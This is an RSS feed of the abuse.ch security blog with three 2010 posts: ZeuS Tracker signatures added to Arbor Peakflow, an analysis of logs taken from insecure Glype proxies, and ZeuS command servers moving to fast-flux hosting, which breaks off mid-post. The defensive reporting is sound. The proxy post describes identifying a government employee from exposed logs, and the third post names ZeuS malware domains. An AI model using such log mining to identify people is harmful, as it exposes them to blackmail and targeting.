<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2germanfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>abuse.ch</title>
	
	<link>http://www.abuse.ch</link>
	<description>The Swiss Security Blog</description>
	<lastBuildDate>Wed, 19 May 2010 08:48:07 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/Abusech" /><feedburner:info uri="abusech" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><geo:lat>47.4944</geo:lat><geo:long>8.7425</geo:long><creativeCommons:license>http://creativecommons.org/licenses/by-nd/3.0/</creativeCommons:license><image><link>http://creativecommons.org/licenses/by-nd/3.0/</link><url>http://creativecommons.org/images/public/somerights20.gif</url><title>Some Rights Reserved</title></image><feedburner:feedFlare href="http://www.newsgator.com/ngs/subscriber/subext.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2FAbusech" src="http://www.newsgator.com/images/ngsub1.gif">Subscribe with NewsGator</feedburner:feedFlare><feedburner:feedFlare href="http://www.bloglines.com/sub/http://feeds.feedburner.com/Abusech" src="http://www.bloglines.com/images/sub_modern11.gif">Subscribe with Bloglines</feedburner:feedFlare><feedburner:feedFlare href="http://www.netvibes.com/subscribe.php?url=http%3A%2F%2Ffeeds.feedburner.com%2FAbusech" src="http://www.netvibes.com/img/add2netvibes.gif">Subscribe with Netvibes</feedburner:feedFlare><feedburner:feedFlare href="http://fusion.google.com/add?feedurl=http%3A%2F%2Ffeeds.feedburner.com%2FAbusech" src="http://buttons.googlesyndication.com/fusion/add.gif">Subscribe with Google</feedburner:feedFlare><feedburner:feedFlare href="http://www.pageflakes.com/subscribe.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2FAbusech" src="http://www.pageflakes.com/ImageFile.ashx?instanceId=Static_4&amp;fileName=ATP_blu_91x17.gif">Subscribe with Pageflakes</feedburner:feedFlare><feedburner:feedFlare href="http://add.my.yahoo.com/content?lg=de&amp;url=http%3A%2F%2Ffeeds.feedburner.com%2FAbusech" src="http://us.i1.yimg.com/us.yimg.com/i/de/my/addtomyyahoo4.gif">Subscribe with Mein Yahoo!</feedburner:feedFlare><item>
		<title>ZeuS Tracker goes Arbor</title>
		<link>http://feedproxy.google.com/~r/Abusech/~3/PM8WTUJXG3c/</link>
		<comments>http://www.abuse.ch/?p=2568#comments</comments>
		<pubDate>Mon, 17 May 2010 19:16:36 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[ZeuS Tracker]]></category>
		<category><![CDATA[Arbor]]></category>

		<guid isPermaLink="false">http://www.abuse.ch/?p=2568</guid>
		<description><![CDATA[I&#8217;m very excited today to announce that Arbor Networks, one of the leading vendors providing DDoS Protection and Network Security world-wide, has added a fingerprint in their Peakflow product family to help Internet Service Providers (ISPs) and companies around the world to mitigate, protect and monitor malicious ZeuS C&#038;C Botnet traffic within their Networks. The [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;m very excited today to announce that <em>Arbor Networks</em>, one of the leading vendors providing DDoS Protection and Network Security world-wide, has added a <em>fingerprint</em> in their <a href="http://www.arbornetworks.com/index.php?option=com_content&#038;task=view&#038;id=1465&#038;Itemid=692" target="_blank">Peakflow product family</a> to help Internet Service Providers (ISPs) and companies around the world to mitigate, protect and monitor malicious ZeuS C&#038;C Botnet traffic within their Networks. The <em>fingerprint</em> provided by Arbor is being generated in cooperation with the <a href="https://zeustracker.abuse.ch" target="_blank">ZeuS Tracker</a>.</p>
<p><a href="http://www.abuse.ch/wp-content/ArborPeakflowZeuSFingerprint.png"><img src="http://www.abuse.ch/wp-content/ArborPeakflowZeuSFingerprint.png" alt="" title="ATF ZeuS C&amp;C Botnet traffic Fingerprint" width="507" height="366" class="aligncenter size-full wp-image-2570" /></a></p>
<p>If you are a network administrator and your company is runing <em>Arbor Peakflow</em> you just can activate the fingerprint using <em>Arbor&#8217;s Active Threat Feed policies (ATF)</em>.</p>
<div class='bookmarkify'><a name='bookmarkify'></a><div class='title' title='Use these links to share this page with others'>Bookmark, tagg it or email it to a friend:</div><div class='linkbuttons'><a href='http://www.bloglines.com/sub/http://www.abuse.ch/?p=2568' title='Save to Bloglines' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/bloglines.png' style='width:16px; height:16px;' alt='[Bloglines] ' /></a> <a href='http://del.icio.us/post?url=http://www.abuse.ch/?p=2568&amp;title=ZeuS Tracker goes Arbor' title='Save to del.icio.us' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/delicious.png' style='width:16px; height:16px;' alt='[del.icio.us] ' /></a> <a href='http://digg.com/submit?phase=2&amp;url=http://www.abuse.ch/?p=2568&amp;title=ZeuS Tracker goes Arbor' title='Digg It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/digg.png' style='width:16px; height:16px;' alt='[Digg] ' /></a> <a href='http://www.facebook.com/share.php?u=http://www.abuse.ch/?p=2568' title='Save to Facebook' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/facebook.png' style='width:16px; height:16px;' alt='[Facebook] ' /></a> <a href='http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.abuse.ch/?p=2568&amp;title=ZeuS Tracker goes Arbor' title='Save to Google Bookmarks' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/google.png' style='width:16px; height:16px;' alt='[Google] ' /></a> <a href='http://www.mister-wong.com/index.php?action=addurl&amp;bm_url=http://www.abuse.ch/?p=2568&amp;bm_description=ZeuS Tracker goes Arbor' title='Save to Mister Wong' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/misterwong.png' style='width:16px; height:16px;' alt='[Mister Wong] ' /></a> <a href='http://www.myspace.com/Modules/PostTo/Pages/?c=http://www.abuse.ch/?p=2568&amp;t=ZeuS Tracker goes Arbor' title='Save to MySpace' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/myspace.png' style='width:16px; height:16px;' alt='[MySpace] ' /></a> <a href='http://slashdot.org/bookmark.pl?url=http://www.abuse.ch/?p=2568&amp;title=ZeuS Tracker goes Arbor' title='Slashdot It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/slashdot.png' style='width:16px; height:16px;' alt='[Slashdot] ' /></a> <a href='http://technorati.com/faves?add=http://www.abuse.ch/?p=2568' title='Add to my Technorati Favorites' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/technorati.png' style='width:16px; height:16px;' alt='[Technorati] ' /></a>  <a title='See more bookmark and sharing options...' href='http://www.abuse.ch/?p=2568#bookmarkify' rel='nofollow'><small>More&nbsp;&raquo;</small></a></div></div>
<p><a href="http://feedads.g.doubleclick.net/~a/q8x8ffT3N0CepVV8yQz-AzdYpbw/0/da"><img src="http://feedads.g.doubleclick.net/~a/q8x8ffT3N0CepVV8yQz-AzdYpbw/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/q8x8ffT3N0CepVV8yQz-AzdYpbw/1/da"><img src="http://feedads.g.doubleclick.net/~a/q8x8ffT3N0CepVV8yQz-AzdYpbw/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Abusech/~4/PM8WTUJXG3c" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.abuse.ch/?feed=rss2&amp;p=2568</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.abuse.ch/?p=2568</feedburner:origLink></item>
		<item>
		<title>When You Think You Surf Anonymously But You Don’t</title>
		<link>http://feedproxy.google.com/~r/Abusech/~3/eYlNqXXFziE/</link>
		<comments>http://www.abuse.ch/?p=2534#comments</comments>
		<pubDate>Mon, 26 Apr 2010 10:03:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Monitoring & Reporting]]></category>
		<category><![CDATA[anonymous]]></category>
		<category><![CDATA[glype]]></category>
		<category><![CDATA[internet censoreship]]></category>
		<category><![CDATA[web proxy]]></category>

		<guid isPermaLink="false">http://www.abuse.ch/?p=2534</guid>
		<description><![CDATA[Many companies, military- and governmental-networks have banned social networking sites like Facebook, Twitter, MySpace &#038;Co from their networks. For instance in August 2009 the U.S. Marine corps just banned Social Networking Sites (SNS) from their classified network (called MARINE CORPS ENTERPRISE NETWORK &#8211; MCEN):
IMMEDIATE BAN OF INTERNET SOCIAL NETWORKING SITES (SNS) ON MARINE CORPS ENTERPRISE [...]]]></description>
			<content:encoded><![CDATA[<p>Many companies, military- and governmental-networks have banned social networking sites like Facebook, Twitter, MySpace &#038;Co from their networks. For instance in August 2009 the U.S. Marine corps just banned Social Networking Sites (SNS) from their classified network (called MARINE CORPS ENTERPRISE NETWORK &#8211; MCEN):</p>
<div class="codesnip-container" >IMMEDIATE BAN OF INTERNET SOCIAL NETWORKING SITES (SNS) ON MARINE CORPS ENTERPRISE NETWORK (MCEN)<br />
[...]<br />
REF A: ORDER TO ADDRESS RISK OF USING NIPRNET CONNECTIVITY TO ACCESS INTERNET SNS.<br />
[...]<br />
1. PURPOSE.<br />
THIS MESSAGE ANNOUNCES AN IMMEDIATE BAN ON INTERNET SNS WITHIN THE MCEN UNCLASSIFIED NETWORK (NIPRNET).</p>
<p>2.  BACKGROUND.  INTERNET SNS ARE DEFINED AS WEB-BASED SERVICES THAT ALLOW COMMUNITIES OF PEOPLE TO SHARE COMMON INTERESTS AND/OR EXPERIENCES (EXISTING OUTSIDE OF DOD NETWORKS) OR FOR THOSE WHO WANT TO EXPLORE INTERESTS AND BACKGROUND DIFFERENT FROM THEIR OWN.  THESE INTERNET SITES IN GENERAL ARE A PROVEN HAVEN FOR MALICIOUS ACTORS AND CONTENT AND ARE PARTICULARLY HIGH RISK DUE TO INFORMATION EXPOSURE, USER GENERATED CONTENT AND TARGETING BY ADVERSARIES.  THE VERY NATURE OF SNS CREATES A LARGER ATTACK AND EXPLOITATION WINDOW, EXPOSES UNNECESSARY INFORMATION TO ADVERSARIES AND PROVIDES AN EASY CONDUIT FOR INFORMATION LEAKAGE THAT PUTS OPSEC, COMSEC, PERSONNEL AND THE MCEN AT AN ELEVATED RISK OF COMPROMISE.  EXAMPLES OF INTERNET SNS SITES INCLUDE FACEBOOK, MYSPACE, AND TWITTER.</p>
<p>3. ACTIONS.  TO MEET THE REQUIREMENTS OF REF A, ACCESS IS HEREBY PROHIBITED TO INTERNET SNS FROM THE MCEN NIPRNET, INCLUDING OVER VIRTUAL PRIVATE NETWORK (VPN) CONNECTIONS.<br />
[...]</p></div>
<p>Reference: <a href="http://www.usmc.mil/news/messages/Pages/MARADMIN0458-09.aspx" target="_blank">www.usmc.mil/news</a></p>
<p>Of course USMC is not the only organistion who banned Social Networking Sites from their network &#8211; there are many other companies and governments out there which followed the ban at the USMC and started banning Social Networking Sites as well. The two most often claimed reasons for such bans are commonly:</p>
<ul>
<li>Security issues while using Social Networking Sites (privacy, mal- and crimeware,  targeted attacks, leak of information on classified networks)</li>
<li>Performance problems/bottlenecks while using Social Networking Sites (direct impact on business/enterprise operations)</li>
</ul>
<p>I don&#8217;t wan&#8217;t to talk with you about the sense of banning Social Networking Sites, but please let me loose a few words about it:</p>
<p>Often there are (legal and comprehensible) reasons to ban SNS from coperate- an governmental networks. But the problem is that often the responsible persons and/or administrators who decided to ban SNS don&#8217;t know the consequences that such a ban can trigger. Let me ask you: Do you really think that users will accept a ban of their *most-favorite-websites*? Of course most of the user won&#8217;t, so they will start trying digging holes in your coperate firewall and webproxies/gateways. The point I would like to outline in this post are the consequences you will trigger when banning social networks as well as the risks/threats which result out of this.</p>
<p>As said before, most user won&#8217;t accept a ban of SNS (and please belive me: that&#8217;s fact <img src='http://www.abuse.ch/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> ). The first thing they will do after your ban becomes active is googling about by-passing your security infrastructure. The first thing your users will come accross are PHP-based web proxy scripts. One of the most popular PHP-based proxy script is called <a href="http://www.glype.com/" target="_blank">Glype</a>: It&#8217;s a tiny, powerful and fast web proxy which is based on PHP. You just have to download the ZIP file, upload the &#8220;upload&#8221; folder to a webspace and start using your brand new webproxy. But WOW &#8211; hey, you even don&#8217;t have to install your own web proxy, you just can use sites like <em>proxy[dot]org</em> and get a fresh list of <strong>5&#8242;000+</strong> working web proxies!</p>
<p>What sounds like honey being poured down their back to your users is purly pain for the administrators and security folks of companies and governmental organizations: Within a few minutes users will be able to bypass security gateways easily. But let&#8217;t talk about the security risks of such <em>Anonymous web proxies</em>.</p>
<p><strong>*** The bad things you don&#8217;t know about such proxies ***</strong><br />
Unfortunately the other site of the coin looks much worse:</p>
<ul>
<li>You don&#8217;t know who run these proxies</li>
<li>You don&#8217;t know if these proxies are secure and clean from any malware and drive-bys</li>
<li>You don&#8217;t know the intentions of the persons who runs these proxies (maybe they have mean ill?)</li>
</ul>
<p>But you have must be aware of one fact: Those proxies aren&#8217;t anonymous! Web Proxy scripts like Glype&#038;Co have a free configurable option wheter the administrator of the (glype-) proxy wants to log the requests which are passing his proxy or not. And you can be sure that the most Glype administrators will do.</p>
<p><strong>*** The facts ***</strong><br />
Fact is that there are a lot of insecure servers out there running <em>Glype</em>: I was able to retrive the logs of several Glype proxies &#8211; and the results are <strong>really</strong> interesting. Some statistical information first:</p>
<div class="codesnip-container" ># of checked proxies: 20<br />
# of Logfiles retrived: 1&#8242;700<br />
# of hits: 64&#8242;063&#8242;377<br />
<strong># of unique IPs: 1,05 Mio</strong><br />
Total Size of logfiles : ~10GB</div>
<p>I took a few hours to analyse the logfiles. The result of my analysis didn&#8217;t suprised me much (Top countries by unqiue IPs):</p>
<p><a href="http://www.abuse.ch/wp-content/glype_countries.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/glype_countries.jpg" alt="" title="Top Countries Using Glype Proxies" width="536" height="425" class="aligncenter size-full wp-image-2545" /></a></p>
<p>Most of the top countries shown above are explainable like China (for building a <a href="http://opennet.net/research/profiles/china" target="_blank">great firewall</a> around its internet users), Turkey (for banning most <a href="http://en.wikipedia.org/wiki/Internet_censorship#Turkey" target="_blank">favorite websites</a> like Facebook, MySpace, Wordpress and Blogspot) and Germany (for the planed <a href="http://www.vorratsdatenspeicherung.de/content/view/46/42/lang,en/" target="_blank">Data Retention Law</a>).</p>
<p>Let&#8217;s take a deeper look at the origin IP addresses which are using such Glype proxies. A huge part of the Glype users are users from:</p>
<ul>
<li>Educational networks like schools and univiersities (trying to break the blockade of Facebook&#038;Co on Edu-Networks)</li>
<li>Home users from DSL- and dialup accounts (trying to bypass the internet censoreship of their ISPs/country)</li>
</ul>
<p>Beside those (mostly) legitimate traffic (generaly I don&#8217;t support internet censorship in any country &#8211; so in my opinion this is some kind of <em>legitimate</em> traffic), there is a lot of noise coming from governmental and military networks around the world. I wont name any countries, but you can be sure that dozens of countries are affected. Some of the affected departments and ministries are listed below (I have translated the most of them from other languages, so don&#8217;t assume all of them belongs to the US &#8211; they don&#8217;t):</p>
<ul>
<li>Ministry of Foreign Affairs</li>
<li>Ministry of Finance</li>
<li>Ministry of Economy</li>
<li>Ministry of Statistics</li>
<li>Ministry of Administration and Interior</li>
<li>Ministry of Industry</li>
<li>Ministry of Interior and Justice</li>
<li>Ministry  of Labour and Social Policy</li>
<li>Ministry of Social Development</li>
<li>Department of Defense</li>
<li>Department of Atomic Energy</li>
<li>Department of Health</li>
<li>Department of Science and Technology</li>
<li>Department of Home Affairs</li>
<li>Department of Water Affairs and Forestry</li>
<li>Department of Environment and Conservation</li>
<li>National Labratory</li>
<li>National Police Service</li>
<li>Residence of the President</li>
<li>Atomic Energy Comission</li>
<li>Centre for Atomic Research</li>
<li>State police</li>
<li>National Telecommunications Commission</li>
<li>Supervision and Administration Commission</li>
<li>State-owned news agency</li>
<li>Various Military Test- and Command Centres around the globe</li>
<li>Various networks which are just named as &#8220;Government of xxxx&#8221;</li>
</ul>
<p>Let&#8217;s have a look at the Top websites accessed by those Glype proxies:</p>
<p><center><br />
<table border=1>
<tr>
<td># of hits</td>
<td>Domain</td>
<td>Descripton</td>
</tr>
<tr>
<td>6&#8242;799&#8242;818</td>
<td>www.aisex.com</td>
<td>Chinese porn site</td>
</tr>
<tr>
<td>5&#8242;195&#8242;698</td>
<td>www.facebook.com</td>
<td>Facebook (incl. fbcn.net)</td>
</tr>
<tr>
<td>1&#8242;019&#8242;967</td>
<td>doubleclick.net</td>
<td>Advertising</td>
</tr>
<tr>
<td>629&#8242;881</td>
<td>www.t66y.com</td>
<td>Chinese porn site</td>
</tr>
<tr>
<td>619&#8242;020</td>
<td>change.menelgame.pl</td>
<td>Online game</td>
</tr>
<tr>
<td>582&#8242;162</td>
<td>whitepages.com.au</td>
<td>Australian Address / Telephone directory</td>
</tr>
<tr>
<td>565&#8242;832</td>
<td>www.wretch.cc</td>
<td>Chinese Social Network / News site</td>
</tr>
<tr>
<td>489&#8242;843</td>
<td>www.manyway.net</td>
<td>Advertising</td>
</tr>
<tr>
<td>477&#8242;499</td>
<td>www.youtube.com</td>
<td>Youtube</td>
</tr>
<tr>
<td>473&#8242;341</td>
<td>www.google-analytics.com</td>
<td>Tracker / Webstatistics</td>
</tr>
<tr>
<td>363&#8242;371</td>
<td>www.xvideos.com</td>
<td>Porn site</td>
</tr>
<tr>
<td>348&#8242;057</td>
<td>notification.pennergame.de</td>
<td>Online game</td>
</tr>
<tr>
<td>318&#8242;106</td>
<td>www.pidown.com</td>
<td>Free file hosting (missused for Torrents)</td>
</tr>
<tr>
<td>297&#8242;981</td>
<td>www.highba.com</td>
<td>Chines porn site</td>
</tr>
<tr>
<td>295&#8242;866</td>
<td>www.google.com</td>
<td>Google</td>
</tr>
<tr>
<td>267&#8242;695</td>
<td>www.palacemoon.com</td>
<td>Chinese porn site</td>
</tr>
<tr>
<td>266&#8242;117</td>
<td>i1.hk</td>
<td>Unknown</td>
</tr>
<tr>
<td>265&#8242;410</td>
<td>www.divshare.com</td>
<td>File sharing / Webdriver (supported by Amnesty International)</td>
</tr>
<tr>
<td>259&#8242;349</td>
<td>www.mycould.com</td>
<td>Chinese Forum</td>
</tr>
<tr>
<td>255&#8242;328</td>
<td>www.jword.jp</td>
<td>Unknown</td>
</tr>
<tr>
<td>229&#8242;032</td>
<td>www.denic.de</td>
<td>German domain registrar (whois missuse)</td>
</tr>
<tr>
<td>198&#8242;225 </td>
<td>www.139flash.com</td>
<td>Online games</td>
</tr>
</table>
<p></center></p>
<p>As we know most users of these Glype proxies are located in China. But for those of you who thought that the chinese users are searching for &#8220;free speach&#8221; and &#8220;tibet&#8221; &#8211; I have to disappoint you: The chinese folks seems not to be different than the folks from the west. So don&#8217;t be suprised that the top website is a chinese porn site (you didn&#8217;t know? China also blocks access to various porn sites).</p>
<p><strong>*** Glype proxies as security risk ***</strong><br />
As I already pointed out I don&#8217;t see a problem in users bypassing internet censorship per se. They just have to know that they don&#8217;t really surf <em>anonymously</em> when they use such script based proxies (like Glype) and that those logfiles are propably accessible by anyone from anywhere.</p>
<p>But such proxies are becoming a problem as soon as they are used by employees of governmental and military organistaions (like shown above): These proxies could be a great resource for terroristic organization and foreign intelligence services! Many of the governmental traces I&#8217;ve seen are on facebook &#8211; so I was able to catch the names of employees of various governmental and military organizations. To show you the threat of such &#8216;information&#8217; I will make real example which I saw in those logfiles.</p>
<p>You might have noticed that I mentioned <em>Ministry of Foreign Affairs</em> before (of a country which I won&#8217;t name here). While checking the logs I just came across a user who surfed on Facebook. The Logfiles provides a link to a profile of a employee of the Ministry of Foreign Affairs. When I checked the profile, I just noticed that this user is obviously a employee of the <strong>Security Service at the Ministry of Foreign Affairs</strong>. In fact, this person is now a high value target for terroristic organization and foreign intelligence services who are now able to get personal information about this person easily. This allows them to <strong>apply pressure and blackmail</strong> the person in order to gain <strong>access to classified information and documents</strong>.</p>
<p><strong>*** Conclusion ***</strong><br />
My research on these Glype proxies allow me to make the following conclusions:</p>
<ul>
<li>Glype- (and other script based proxies) aren&#8217;t really anonymous</li>
<li>You don&#8217;t know who runs these proxies</li>
<li>Most users for those proxies just want to bypass internet censoreship of their country or schools/universities</li>
<li>But there are many users from governmental and military organizations using those proxies too</li>
<li>In those cases you may be able to <em>hide</em> your web traffic from your administrator but you will leave traces in other places which are probably a threat of your whole company!</li>
<li>Administrators and security folks have to know about these risks and have to adopt compensating measures and/or providing awareness to its users</li>
<li>If <strong>you</strong> run such a Glype proxy you have to know that you will propably be responsible for any illegal activites which are passing your proxy. Are you sure that your Glype proxy is not being abuse to access ilegal content like Childporn?</li>
</ul>
<div class='bookmarkify'><a name='bookmarkify'></a><div class='title' title='Use these links to share this page with others'>Bookmark, tagg it or email it to a friend:</div><div class='linkbuttons'><a href='http://www.bloglines.com/sub/http://www.abuse.ch/?p=2534' title='Save to Bloglines' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/bloglines.png' style='width:16px; height:16px;' alt='[Bloglines] ' /></a> <a href='http://del.icio.us/post?url=http://www.abuse.ch/?p=2534&amp;title=When You Think You Surf Anonymously But You Don&#8217;t' title='Save to del.icio.us' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/delicious.png' style='width:16px; height:16px;' alt='[del.icio.us] ' /></a> <a href='http://digg.com/submit?phase=2&amp;url=http://www.abuse.ch/?p=2534&amp;title=When You Think You Surf Anonymously But You Don&#8217;t' title='Digg It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/digg.png' style='width:16px; height:16px;' alt='[Digg] ' /></a> <a href='http://www.facebook.com/share.php?u=http://www.abuse.ch/?p=2534' title='Save to Facebook' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/facebook.png' style='width:16px; height:16px;' alt='[Facebook] ' /></a> <a href='http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.abuse.ch/?p=2534&amp;title=When You Think You Surf Anonymously But You Don&#8217;t' title='Save to Google Bookmarks' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/google.png' style='width:16px; height:16px;' alt='[Google] ' /></a> <a href='http://www.mister-wong.com/index.php?action=addurl&amp;bm_url=http://www.abuse.ch/?p=2534&amp;bm_description=When You Think You Surf Anonymously But You Don&#8217;t' title='Save to Mister Wong' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/misterwong.png' style='width:16px; height:16px;' alt='[Mister Wong] ' /></a> <a href='http://www.myspace.com/Modules/PostTo/Pages/?c=http://www.abuse.ch/?p=2534&amp;t=When You Think You Surf Anonymously But You Don&#8217;t' title='Save to MySpace' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/myspace.png' style='width:16px; height:16px;' alt='[MySpace] ' /></a> <a href='http://slashdot.org/bookmark.pl?url=http://www.abuse.ch/?p=2534&amp;title=When You Think You Surf Anonymously But You Don&#8217;t' title='Slashdot It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/slashdot.png' style='width:16px; height:16px;' alt='[Slashdot] ' /></a> <a href='http://technorati.com/faves?add=http://www.abuse.ch/?p=2534' title='Add to my Technorati Favorites' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/technorati.png' style='width:16px; height:16px;' alt='[Technorati] ' /></a>  <a title='See more bookmark and sharing options...' href='http://www.abuse.ch/?p=2534#bookmarkify' rel='nofollow'><small>More&nbsp;&raquo;</small></a></div></div>
<p><a href="http://feedads.g.doubleclick.net/~a/tu2pn_3v3Nu_YSLak-re4NzCYos/0/da"><img src="http://feedads.g.doubleclick.net/~a/tu2pn_3v3Nu_YSLak-re4NzCYos/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/tu2pn_3v3Nu_YSLak-re4NzCYos/1/da"><img src="http://feedads.g.doubleclick.net/~a/tu2pn_3v3Nu_YSLak-re4NzCYos/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Abusech/~4/eYlNqXXFziE" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.abuse.ch/?feed=rss2&amp;p=2534</wfw:commentRss>
		<slash:comments>4</slash:comments>
		<feedburner:origLink>http://www.abuse.ch/?p=2534</feedburner:origLink></item>
		<item>
		<title>ZeuS: Cybercriminals moving over to FastFlux Hosting</title>
		<link>http://feedproxy.google.com/~r/Abusech/~3/OBQDPbbjUZo/</link>
		<comments>http://www.abuse.ch/?p=2515#comments</comments>
		<pubDate>Sat, 03 Apr 2010 09:35:13 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[ZeuS Tracker]]></category>
		<category><![CDATA[fastflux]]></category>
		<category><![CDATA[troyak-as]]></category>
		<category><![CDATA[ZeuS]]></category>

		<guid isPermaLink="false">http://www.abuse.ch/?p=2515</guid>
		<description><![CDATA[A month ago, the well-known bulletproof hoster Troyak was cut from the internet (read more). Troyak tried hard to get reconnected to the internet &#8211; But the disconnect of Troyak made a lot of noise in the international press which led to that Troyak was not able to stay connected with the World Wide Web.

But [...]]]></description>
			<content:encoded><![CDATA[<p>A month ago, the well-known bulletproof hoster <strong>Troyak</strong> was cut from the internet (<a href="http://www.abuse.ch/?p=2417" target="_blank">read more</a>). Troyak tried hard to get reconnected to the internet &#8211; But the disconnect of Troyak made a lot of noise in the international press which led to that Troyak was not able to stay connected with the World Wide Web.</p>
<p><a href="http://www.abuse.ch/wp-content/ZeuSccMarch.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/ZeuSccMarch-300x94.jpg" alt="" title="Active ZeuS C&amp;Cs in March 2010" width="300" height="94" class="aligncenter size-medium wp-image-2517" /></a></p>
<p>But maybe you wonder why the number of active ZeuS C&#038;Cs still dropped after the Troyak shutdown. Let me clear this: After the shutdown of troyak, several other ISPs which went a platform for cybercriminals for month got obviously under massiv pressure from their upstream providers. Many of those ISPs contacted me during the last few weeks and made a clear statement that they no longer tolerate any cybercriminals in their networks. </p>
<p><strong>The good news first:</strong><br />
Today, a month after the Troyak shutdown, the number of active C&#038;C servers is still on a very low level. We are now at a point where ZeuS C&#038;C servers get offline just a few minutes after they appears on the ZeuS Tracker.</p>
<p><strong>And now the bad news:</strong><br />
During the last few days I just noticed that more and more ZeuS C&#038;C servers popping up which are hosted on a <a href="http://en.wikipedia.org/wiki/Fast_flux" target="_blank">FastFlux</a> botnet. To be precise: It&#8217;s not new that cybercriminals are hosting the infections binaries (used to infect their vicitims) on FastFlux botnets. Even more it&#8217;s pretty new to me that the cybercrmininals are hosting their Command&#038;Control servers (the servers which are hosting the dropzone) are also FastFlux hosted. For example:</p>
<ul>
<li><a href="https://zeustracker.abuse.ch/monitor.php?host=mmjl3l45lkjbdb.ru" target="_blank">mmjl3l45lkjbdb.ru</a></li>
<li><a href="https://zeustracker.abuse.ch/monitor.php?host=agreement52.com" target="_blank">agreement52.com</a></li>
<li><a href="https://zeustracker.abuse.ch/monitor.php?host=domainsupp.net" target="_blank">domainsupp.net</a></li>
</ul>
<p>To go along with this &#8216;new&#8217; trend I decided to add a new &#8216;level&#8217; to the ZeuS Tracker:</p>
<div class="codesnip-container" >Level: 5<br />
Description: Hosted on a FastFlux botnet<br />
Color: Blue</div>
<p>Whenever you see a ZeuS C&#038;C server which is FastFlux hosted on the ZT, the ZeuS Tracker will now provide you additional information:</p>
<p><a href="http://www.abuse.ch/wp-content/ZeuSFastFluxZT.jpg"><img src="http://www.abuse.ch/wp-content/ZeuSFastFluxZT.jpg" alt="" title="ZeuS C&amp;C hosted on FastFlux" width="548" height="481" class="aligncenter size-full wp-image-2522" /></a></p>
<p>As you can see above, the ZeuS Tracker shows up the assigned bots (IP addresses) as well as their status on <a href="http://www.spamhaus.org/xbl/" target="_blank">Spamhaus&#8217;s XBL</a>. Additionally the <em>time to live</em> (TTL) of the A record will be displayed (on FastFlux hosted domains mostly between 180 and 1800 seconds).</p>
<p>To get a list of ZeuS domains which are currenlty hosted on a FastFlux botnet you can just set a filter for  &#8220;<a href="https://zeustracker.abuse.ch/monitor.php?filter=level5" target="_blank">level 5</a>&#8221; tagged domains on the ZeuS Tracker:</p>
